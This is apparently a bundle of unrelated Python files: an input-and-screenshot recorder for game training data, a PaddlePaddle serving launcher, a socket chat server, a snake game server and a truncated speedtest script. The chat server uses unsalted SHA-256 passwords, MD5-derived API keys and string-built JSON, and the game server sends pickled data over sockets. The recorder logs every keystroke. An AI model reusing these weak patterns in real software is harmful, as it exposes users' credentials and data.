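# falling back to the default 5.5B weights while a course model is fetched.
# factory = ELMoFactory()
# elmo = factory.get_model_for_course(course_id=42)
# vectors = elmo.embed_sentence(["An", "example", "sentence"])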
|
create_dataset.py | """
This file will create a dataset of images and labels for training.
Author: Arda Mavi
"""
import os
import time
from multiprocessing import Process
import numpy as np
from PIL import Image
from mss import mss
from pynput.keyboard import Listener as key_listener
from pynput.mouse import Listener as mouse_listener
from game_control import get_id
from get_dataset import save_img
def get_screenshot():
"""
This function will take a screenshot of the game.
:return: PIL Image of the screenshot
"""
with mss() as sct:
monitor = sct.monitors[1]
sct_img = sct.grab(monitor)
# Convert to PIL/Pillow Image
img = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX')
img = np.array(img)[:, :, :3] # Get first 3 channel from image as numpy array.
# resize it with PIL, because scipy.misc.imresize is deprecated.
img = Image.fromarray(img)
img = img.resize((img.size[0] * 4, img.size[1] * 4), resample=Image.BICUBIC)
# img = imresize(img, (150, 150, 3)).astype('float32') / 255.
return img
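# Usage sketch (illustrative only): grab one frame and inspect it.
# frame = get_screenshot()
# print(frame.size)  # 4x the captured monitor resolution, see the resize above
# frame.save('debug_frame.png')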
def save_event_keyboard(data_path, event, key):
"""
This function will save the event of the keyboard.
:param data_path: path to save the event
:param event: down or up
:param key: which key is pressed
"""
key = get_id(key)
if key != 1000:
data_path = data_path + '/-1,-1,{0},{1},{2}'.format(event, key, time.time())
screenshot = get_screenshot()
save_img(data_path, screenshot)
def save_event_mouse(data_path, x_coordinate, y_coordinate, button, pressed):
"""
This function will save the event of the mouse.
:param data_path: path to save the event
:param x_coordinate: x coordinate
:param y_coordinate: y coordinate
:param button: pynput mouse Button enum for the clicked button
:param pressed: True if the button was pressed, False if released
"""
# 539,996,0,0,1643879876.0606766
# 539 x coordinate
# 996 y coordinate
# 1643879876.0606766 time since epoch
# button is an enum
# cut button at dot and keep the last part.
button = button.name.split('.')[-1]
data_path = data_path + '/{0},{1},{2},{3},{4}'.format(x_coordinate, y_coordinate, button, int(pressed),
time.time())
screenshot = get_screenshot()
save_img(data_path, screenshot)
def listen_mouse():
"""
This function will listen to the mouse and save each event.
:return: None
"""
data_path = 'Data/Train_Data/Mouse'
if not os.path.exists(data_path):
os.makedirs(data_path)
def on_click(x_coordinate, y_coordinate, button, pressed):
"""
This function will get the x and y coordinate of the mouse, when a click happens.
:param x_coordinate: int
:param y_coordinate: int
:TODO: fix the function. Help from: https://pynput.readthedocs.io/en/latest/mouse.html
"""
print(data_path, x_coordinate, y_coordinate, button, pressed)
save_event_mouse(data_path, x_coordinate, y_coordinate, button, pressed)
def on_scroll(x_cord, y_cord, dx, dy):
"""
This function will get the new x and y coordinate of the mouse, when a scroll happens.
dx and dy are the amount of scrolling.
:param x_cord: int
:param y_cord: int
:param dx: int
:param dy: int
:return: None
"""
pass
def on_move(x_cord, y_cord):
"""
This function will get the new x and y coordinate of the mouse, when a move happens.
If this callback raises an exception, or returns False, the mouse tracking will be stopped.
:param x_cord: int
:param y_cord: int
:return: None
"""
pass
with mouse_listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll) as listener:
listener.join()
def listen_keyboard():
"""
This function will listen to the keyboard and save each event.
:return: None
"""
data_path = 'Data/Train_Data/Keyboard'
if not os.path.exists(data_path):
os.makedirs(data_path)
def on_press(key):
save_event_keyboard(data_path, 1, key)
def on_release(key):
save_event_keyboard(data_path, 2, key)
with key_listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
def main():
"""
This is the main function.
"""
dataset_path = 'Data/Train_Data/'
if not os.path.exists(dataset_path):
os.makedirs(dataset_path)
# Start to listening mouse with new process:
Process(target=listen_mouse, args=()).start()
listen_keyboard()
if __name__ == '__main__':
main()
|
serve.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
Host a trained paddle model with one line command
Example:
python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
from flask import Flask, request
import sys
if sys.version_info.major == 2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
from http.server import BaseHTTPRequestHandler, HTTPServer
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument(
"--thread", type=int, default=2, help="Concurrency of server")
parser.add_argument(
"--port", type=int, default=9292, help="Port of the starting gpu")
parser.add_argument(
"--device", type=str, default="gpu", help="Type of device")
parser.add_argument("--gpu_ids", type=str, default="", help="gpu ids")
parser.add_argument(
"--model", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--name", type=str, default="None", help="Default service name")
parser.add_argument(
"--use_mkl", default=False, action="store_true", help="Use MKL")
parser.add_argument(
"--precision",
type=str,
default="fp32",
help="precision mode(fp32, int8, fp16, bf16)")
parser.add_argument(
"--use_calib",
default=False,
action="store_true",
help="Use TensorRT Calibration")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_encryption_model",
default=False,
action="store_true",
help="Use encryption model")
parser.add_argument(
"--use_multilang",
default=False,
action="store_true",
help="Use Multi-language-service")
parser.add_argument(
"--use_trt", default=False, action="store_true", help="Use TensorRT")
parser.add_argument(
"--use_lite", default=False, action="store_true", help="Use PaddleLite")
parser.add_argument(
"--use_xpu", default=False, action="store_true", help="Use XPU")
parser.add_argument(
"--product_name",
type=str,
default=None,
help="product_name for authentication")
parser.add_argument(
"--container_id",
type=str,
default=None,
help="container_id for authentication")
return parser.parse_args()
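# Typical invocations (sketch; model paths are placeholders):
#   python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
#   python -m paddle_serving_server.serve --model ./serving_server_model --gpu_ids 0,1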
def start_standard_model(serving_port): # pylint: disable=doc-string-missing
args = serve_args()
thread_num = args.thread
model = args.model
port = serving_port
workdir = args.workdir
device = args.device
mem_optim = not args.mem_optim_off
ir_optim = args.ir_optim
max_body_size = args.max_body_size
use_mkl = args.use_mkl
use_encryption_model = args.use_encryption_model
use_multilang = args.use_multilang
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(model):
infer_op_name = "general_infer"
# Temporary support for the OCR model; it will be completely revised later.
# To use this, the C++ server must be compiled with the WITH_OPENCV option.
if len(model) == 2 and idx == 0 and model[0] == 'ocr_det_model':
infer_op_name = "general_detection"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
server = None
if use_multilang:
server = serving.MultiLangServer()
else:
server = serving.Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.use_mkl(use_mkl)
server.set_max_body_size(max_body_size)
server.set_port(port)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.use_encryption_model(use_encryption_model)
if args.product_name is not None:
server.set_product_name(args.product_name)
if args.container_id is not None:
server.set_container_id(args.container_id)
server.load_model_config(model)
server.prepare_server(workdir=workdir, port=port, device=device)
server.run_server()
def start_gpu_card_model(index, gpuid, port, args): # pylint: disable=doc-string-missing
workdir = args.workdir
gpuid = int(gpuid)
device = "gpu"
if gpuid == -1:
device = "cpu"
elif gpuid >= 0:
port = port + index
thread_num = args.thread
model = args.model
mem_optim = not args.mem_optim_off
ir_optim = args.ir_optim
use_mkl = args.use_mkl
max_body_size = args.max_body_size
use_multilang = args.use_multilang
if gpuid >= 0:
workdir = "{}_{}".format(args.workdir, gpuid)
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(model):
infer_op_name = "general_infer"
if len(model) == 2 and idx == 0:
infer_op_name = "general_detection"
else:
infer_op_name = "general_infer"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
if use_multilang:
server = serving.MultiLangServer()
else:
server = serving.Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.use_mkl(use_mkl)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_max_body_size(max_body_size)
if args.use_trt:
server.set_trt()
if args.use_lite:
server.set_lite()
server.set_device(device)
if args.use_xpu:
server.set_xpu()
if args.product_name is not None:
server.set_product_name(args.product_name)
if args.container_id is not None:
server.set_container_id(args.container_id)
server.load_model_config(model)
server.prepare_server(
workdir=workdir,
port=port,
device=device,
use_encryption_model=args.use_encryption_model)
if gpuid >= 0:
server.set_gpuid(gpuid)
server.run_server()
def start_multi_card(args, serving_port=None): # pylint: disable=doc-string-missing
gpus = ""
if serving_port is None:
serving_port = args.port
if args.gpu_ids == "":
gpus = []
else:
gpus = args.gpu_ids.split(",")
if "CUDA_VISIBLE_DEVICES" in os.environ:
env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
for ids in gpus:
if int(ids) >= len(env_gpus):
print(
" Max index of gpu_ids out of range, the number of CUDA_VISIBLE_DEVICES is {}."
.format(len(env_gpus)))
exit(-1)
else:
env_gpus = []
if args.use_lite:
print("run using paddle-lite.")
start_gpu_card_model(-1, -1, serving_port, args)
elif len(gpus) <= 0:
print("gpu_ids not set, going to run cpu service.")
start_gpu_card_model(-1, -1, serving_port, args)
else:
gpu_processes = []
for i, gpu_id in enumerate(gpus):
p = Process(
target=start_gpu_card_model,
args=(
i,
gpu_id,
serving_port,
args, ))
gpu_processes.append(p)
for p in gpu_processes:
p.start()
for p in gpu_processes:
p.join()
class MainService(BaseHTTPRequestHandler):
def get_available_port(self):
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
return default_port + i
def start_serving(self):
start_multi_card(args, serving_port)
def get_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "wb") as f:
f.write(key)
return True
def check_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "rb") as f:
cur_key = f.read()
if key != cur_key:
return False
return True
def start(self, post_data):
post_data = json.loads(post_data.decode('utf-8'))
global p_flag
if not p_flag:
if args.use_encryption_model:
print("waiting key for model")
if not self.get_key(post_data):
print("not found key in request")
return False
global serving_port
global p
serving_port = self.get_available_port()
p = Process(target=self.start_serving)
p.start()
time.sleep(3)
if p.is_alive():
p_flag = True
else:
return False
else:
if p.is_alive():
if not self.check_key(post_data):
return False
else:
return False
return True
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if self.start(post_data):
response = {"endpoint_list": [serving_port]}
else:
response = {"message": "start serving failed"}
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(response).encode())
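# Sketch of the encryption handshake handled above (hypothetical client call):
# the first POST carrying {"key": "<base64 key>"} writes the key next to each
# model dir, spawns the serving process, and returns the real serving port.
#   curl -X POST -d '{"key": "c2VjcmV0"}' http://localhost:9292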
if __name__ == "__main__":
args = serve_args()
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
if args.name == "None":
from .web_service import port_is_available
if args.use_encryption_model:
p_flag = False
p = None
serving_port = 0
server = HTTPServer(('localhost', int(args.port)), MainService)
print(
'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
)
server.serve_forever()
else:
start_multi_card(args)
else:
from .web_service import WebService
web_service = WebService(name=args.name)
web_service.load_model_config(args.model)
gpu_ids = args.gpu_ids
if gpu_ids == "":
if "CUDA_VISIBLE_DEVICES" in os.environ:
gpu_ids = os.environ["CUDA_VISIBLE_DEVICES"]
if len(gpu_ids) > 0:
web_service.set_gpus(gpu_ids)
web_service.prepare_server(
workdir=args.workdir,
port=args.port,
device=args.device,
use_lite=args.use_lite,
use_xpu=args.use_xpu,
ir_optim=args.ir_optim,
thread_num=args.thread,
precision=args.precision,
use_calib=args.use_calib)
web_service.run_rpc_service()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
web_service._launch_web_service()
service_name = "/" + web_service.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return web_service.get_prediction(request)
app_instance.run(host="0.0.0.0",
port=web_service.port,
threaded=False,
processes=4)
|
m_server.py | '''
## MESSAGE SERVER 1.0
##
## The simple messaging server can be installed on any machine
## Its main function is to receive, route and send messages to users
## It also allows users to create accounts, complete with password authentication
## Finally, it stores the public keys used for End to End encryption.
## Uses a json api to perform actions
## Logged messages are indecipherable to all except the communicating parties
##
## Author: Shimpano Mutangama
'''
import socket
import select
import threading
import time
import json
import sqlite3
import hashlib
class Message:
def __init__(self,message,sender,receipient):
self.message = message
self.sender = sender
self.receipient = receipient
self.time = time.time()
def time_str(self):
current_time_epoch = self.time
time_format = '%Y/%m/%d %H:%M:%S'
return time.strftime(time_format,time.localtime(current_time_epoch))
def json(self):
json_string = '{"message":"%s", "sender":"%s", "receipient":"%s", "date":"%s","success":true,"type":"message"}'%(self.message,self.sender,self.receipient,self.time_str())
return json_string
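# Example of the JSON this produces (illustrative values; note the "receipient"
# spelling is part of the wire format):
# {"message":"hello", "sender":"alice", "receipient":"bob",
#  "date":"2020/01/01 12:00:00","success":true,"type":"message"}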
class MessageServer:
def __init__(self):
self._connections = {}
self.INPUTS = []
self.OUTPUTS = []
self._message_queues = {}
self._message_queue = []
self.server_socket = None
def _init_database(self):
#Create database and tables
self._conn = sqlite3.connect('message_server.db')
self._cursor = self._conn.cursor()
self._cursor.execute("CREATE TABLE IF NOT EXISTS messages (id INTEGER PRIMARY KEY NOT NULL, message varchar(200), sender varchar(200), receipient varchar(200), date varchar(200), read INTEGER)")
self._cursor.execute("CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY NOT NULL, username varchar(200),password varchar(200),api_key varchar(200),public_rsa varchar(2000))")
self._conn.commit()
self._conn.close()
def start(self):
self._init_database()
t = threading.Thread(target = self.listen_for_connections)
t.daemon = True
t.start()
time.sleep(5)
while True:
choice = raw_input(">>")
if len(choice) > 0:
print "Shutdown..."
for connection in self._connections:
self._connections[connection].shutdown(0)
self._connections[connection].close()
break
def listen_for_connections(self):
SERVER_HOST = '0.0.0.0'
SERVER_PORT = 1000
SERVER_TUPLE = (SERVER_HOST,SERVER_PORT)
self.server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.server_socket.bind(SERVER_TUPLE)
self.server_socket.listen(5)
#self.server_socket.settimeout(5)
self._connections['server_socket'] = self.server_socket
self.INPUTS.append(self.server_socket)
while True:
print "Listening for connections...\n"
read_sockets,write_sockets,error_sockets = select.select(self.INPUTS,[],[])
for sock in read_sockets:
if sock == self.server_socket:
client_connection,client_address = self.server_socket.accept()
print "Connected: ",client_address
data = client_connection.recv(1024)
response = self.parse_data(data)
client_connection.sendall(response)
json_response = json.loads(response)
if json_response["success"] == True:
client_id = json_response["username"]
self._connections[client_id] = client_connection
#client_connection.setblocking(0)
self.INPUTS.append(client_connection)
print "%s connected"%(client_id)
else:
print"Login or Registration Failed"
else:
try:
self.receive_messages(sock)
#self.INPUTS.remove(sock)
except:
#raise
error_sockets.append(sock)
print"Added an error socket"
for sock in error_sockets:
sock.close()
self.INPUTS.remove(sock)
def parse_data(self,data):
print "Request: %s"%data
json_data = json.loads(data)
#print"JSON received: %s"%json_data
if json_data["type"] == "registration":
response = self.register_user(json_data)
elif json_data["type"] == "login":
response = self.login_user(json_data)
return response
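# Example requests handled above (illustrative values):
# {"type": "login", "username": "alice", "password": "secret"}
# {"type": "registration", "username": "alice", "password": "secret",
#  "public_key": "<PEM-encoded public RSA key>"}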
def check_user_api_key(self, username, key):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
check_key_sql = 'SELECT * FROM users WHERE username=? AND api_key=?'
records = cursor.execute(check_key_sql,(username,key))
count = 0
for record in records:
count+=1
conn.close()
if count == 0:
return False
else:
return True
def register_user(self,json_data):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
username = json_data["username"]
password = json_data["password"]
password_hash = hashlib.sha256(password).hexdigest()
public_rsa = json_data["public_key"]
user_kvp = "%s:%s"%(username,password)
api_key = "AK"+hashlib.md5(user_kvp).hexdigest()[::-1]
check_user_exists_sql = 'SELECT * FROM users WHERE username=?'
records = cursor.execute(check_user_exists_sql,(username,))
count = 0
for user in records:
count+=1
if count > 0:
response_json = '{"success":false,"reason":"username already registered."}'
else:
registration_sql = 'INSERT INTO users (username,password,api_key,public_rsa) VALUES (?,?,?,?)'
try:
cursor.execute(registration_sql,(username,password_hash,api_key,public_rsa))
response_json = '{"username":"%s","api_key":"%s","success":true}'%(username,api_key)
except:
response_json = '{"success":false,"reason":"failed."}'
conn.commit()
conn.close()
return response_json
def login_user(self,json_data):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
username = json_data["username"]
password = json_data["password"]
password_hash = hashlib.sha256(password).hexdigest()
login_sql = 'SELECT username,api_key FROM users WHERE username=? AND password=?'
user = cursor.execute(login_sql,(username,password_hash)).fetchone()
print"User Object: ",user
if user is not None:
response_json = '{"username":"%s","api_key":"%s","success":true}'%(user[0],user[1])
else:
response_json = '{"success":false,"reason":"incorrect login details."}'
conn.close()
return response_json
def receive_messages(self,client_socket):
while True:
try:
chunk= client_socket.recv(1024)
#print"First chunk received"
data = ''
while chunk:
if chunk[-2:] == "/0":
data+=chunk[:-2]
break
data+=chunk
chunk = client_socket.recv(1024)
#print"Request Received"
print"Received: ",data
request = json.loads(data)
logged_user = request["logged_user"]
api_key = request["api_key"]
#Check if user is using the right api key
authorized = self.check_user_api_key(logged_user,api_key)
if authorized:
if request["type"] == "message":
message = self.parse_message_data(data)
self.send_message(message)
elif request["type"] == "file":
try:
receipient = request["receipient"]
receipient_socket = self._connections[receipient]
receipient_socket.sendall(json.dumps(request)+"/0")
chunk = client_socket.recv(1024)
while chunk:
if chunk[-5:] == "/0end":
receipient_socket.send(chunk)
break
receipient_socket.send(chunk)
chunk = client_socket.recv(1024)
client_socket.sendall('{"message":"File Successfully Sent","type":"alert","success":true}')
client_socket.send("/0")
except:
# Report the failure to the sender instead of tearing the connection down.
response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
client_socket.sendall(response)
client_socket.send("/0")
client_socket.settimeout(None)
elif request["type"] == "unread":
logged_user = request["logged_user"]
response = self.fetch_unread_messages(logged_user)
self.read_messages(logged_user)
json_response = json.dumps(response)
if response == 'fail':
json_response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
client_socket.sendall(json_response)
client_socket.send("/0")
elif request["type"] == "publickey":
response = self.fetch_public_key(request["username"])
if response == 'fail':
response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
#print"Key Response: %s"%response
client_socket.sendall(response)
client_socket.send("/0")
elif request["type"] == "sharedkey":
try:
receipient_socket = self._connections[request["receipient"]]
receipient_socket.sendall(json.dumps(request))
receipient_socket.send("/0")
except:
response = '{"message":"Failed to Send","type":"alert","success":false}'
client_socket = self._connections[request["logged_user"]]
client_socket.sendall(response)
client_socket.send("/0")
else:
response = '{"message":"Failed to Send... You are not authorized.","type":"alert","success":false}'
client_socket.sendall(response)
client_socket.send("/0")
except:
raise
break
def parse_message_data(self,data):
#print "Data Received: %s"%data
message_data = json.loads(data)
message_text = message_data["message"]
sender = message_data["sender"]
receipient = message_data["receipient"]
message = Message(message_text,sender,receipient)
return message
def user_exists(self,username):
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
user_exists_sql = 'SELECT * FROM users WHERE username=?'
records = cursor.execute(user_exists_sql,(username,))
count = 0
for record in records:
count+=1
conn.close()
if count == 0:
return False
else:
return True
def send_message(self,message):
try:
if self.user_exists(message.receipient):
self.save_message(message)
receipient_socket = self._connections[message.receipient]
sender_socket = self._connections[message.sender]
receipient_socket.sendall(message.json())
receipient_socket.send("/0")
sender_socket.sendall('{"message":"Message Successfully Sent","type":"alert","success":true}')
sender_socket.send("/0")
self.read_messages(message.receipient)
except:
#raise
sender_socket = self._connections[message.sender]
if self.user_exists(message.receipient):
sender_socket.sendall('{"message":"Message Successfully Sent","type":"alert","success":true}')
else:
sender_socket.sendall('{"message":"Failed to Send","type":"alert","success":false}')
sender_socket.send("/0")
def save_message(self,message):
try:
conn = sqlite3.connect('message_server.db')
cursor = conn.cursor()
read = 0 #False
save_message_sql = 'INSERT INTO messages (message,sender,receipient,date,read) VALUES (?,?,?,?,?)'
cursor.execute(save_message_sql,(message.message,message.sender,message.receipient,message.time_str(),read))
conn.commit()
conn.close()
except:
raise
def read_messages(self,username):
try:
conn = sqlite3.connect('message_server.db')
cursor = conn.cursor()
read_sql = 'UPDATE messages SET read=1 WHERE receipient=? AND read=0'
cursor.execute(read_sql,(username,))
conn.commit()
conn.close()
except:
print "Something in the SQL"
raise
def fetch_unread_messages(self,username):
try:
conn = sqlite3.connect('message_server.db')
cursor = conn.cursor()
fetch_unread_sql = 'SELECT message,sender,receipient,date FROM messages WHERE receipient=? AND read=0'
unread_messages = cursor.execute(fetch_unread_sql,(username,))
objects = []
for message in unread_messages:
message_dict = {}
message_dict['message'] = message[0]
message_dict['sender'] = message[1]
message_dict['receipient'] = message[2]
message_dict['date'] = message[3]
objects.append(message_dict)
conn.close()
response = {}
response['count'] = len(objects)
response['objects'] = objects
response['receipient'] = username
response['success'] = True
response["type"] = "unread"
except:
# Fall back to the sentinel the caller checks for instead of re-raising.
response = "fail"
return response
#Public Key
def fetch_public_key(self,username):
try:
conn = sqlite3.connect("message_server.db")
cursor = conn.cursor()
public_key_sql = 'SELECT username,public_rsa FROM users WHERE username=?'
records = cursor.execute(public_key_sql,(username,))
key_record = records.fetchone()
if key_record is not None:
json_response = '{"username":"%s","public_key":"%s","type":"publickey"}'%(key_record[0],key_record[1].replace("\n","\\n"))
else:
json_response = 'fail'
conn.commit()
conn.close()
return json_response
except:
return "fail"
def main():
global server
server = MessageServer()
server.start()
if __name__=="__main__":
main()
|
server.py | import Snake
import time
import json
import pickle
import threading
import socket
# select level
with open('levels/level.json') as f:
world = json.load(f)
env = Snake.environment(19, 11, repeat = True, world = world, tilesize = 50)
players = {}
debugging = False
s = socket.socket()
s.bind(('', 65231))
s.listen(10)
def debug(*msg):
if debugging:
print(*msg)
def listen_for_connections(lock):
global players
while True:
print("listening...")
conn, addr = s.accept() # handles connections
print(f"got connection: {conn}, {addr}")
conn.setblocking(True)
newsnake = Snake.snake(-4,5,3)
debug("listen_for_connections: acquiring")
with lock:
debug("listen_for_connections: acquired")
conn.send(pickle.dumps(env)) # send world and initial state data to new player
players[conn] = newsnake
threading.Thread(target=handle_client_rqsts, args=(conn, newsnake, lock)).start() # start a new rqsts handler
debug(env.snakes, players[conn])
debug("listen_for_connections: released")
s.close()
print("Server stopped listening.")
def handle_client_rqsts(conn, snk, lock):
global players
print("New thread started.")
while True:
try:
rqst = conn.recv(16).decode()
except ConnectionAbortedError:
continue
except ConnectionResetError:
continue
debug("handle_client_rqsts: acquiring")
with lock:
debug("handle_client_rqsts: acquired")
# parse request
if rqst == 'LEAVE':
try:
env.rmsnake(snk)
except ValueError:
pass
del players[conn]
conn.sendall('LEFT'.encode())
conn.close()
break
elif rqst == 'JOIN':
if snk not in env.snakes:
snk.reset(0,5,5)
env.addsnake(snk)
print(env.snakes)
elif rqst == 'ML':
snk.changedir(1)
elif rqst == 'MR':
snk.changedir(0)
elif rqst == 'MU':
snk.changedir(2)
elif rqst == 'MD':
snk.changedir(-1)
debug("handle_client_rqsts: released")
print("Player left. Lock released.")
def update_loop(lock):
global players
while True:
debug("update_loop: acquiring")
with lock:
debug("update_loop: acquired")
env.update()
data = pickle.dumps((env.snakes, env.foods))
header = len(data).to_bytes(4, 'little')
try:
for player in players:
player.sendall(header)
for player in players:
player.sendall(data)
except ConnectionAbortedError:
pass
debug(data)
debug("update_loop: released")
time.sleep(0.1) # update game world and send status every .1 seconds
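# Client-side read sketch for the protocol above (hypothetical client socket):
# the server sends a 4-byte little-endian length header, then a pickle of
# (env.snakes, env.foods) of exactly that many bytes.
# header = sock.recv(4)
# length = int.from_bytes(header, 'little')
# buf = b''
# while len(buf) < length:
#     buf += sock.recv(length - len(buf))
# snakes, foods = pickle.loads(buf)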
def start():
lock = threading.Lock()
t1 = threading.Thread(target=listen_for_connections, args=(lock,)) # handles new connections
t2 = threading.Thread(target=update_loop, args=(lock,)) # updates game loop and sends results
t1.start()
t2.start()
print("started")
start()
|
speedtest_cli.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.3.0'
# Some global variables we use
source = None
shutdown_event = None
import os
import re
import sys
import math
import signal
import socket
import timeit
import threading
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
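# Worked example (approximate): New York (40.71, -74.01) to Los Angeles
# (34.05, -118.24) yields roughly 3.9e3 km of great-circle distance.
# distance([40.71, -74.01], [34.05, -118.24])  # ~= 3934 km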
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
f = urlopen(self.url)
while not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
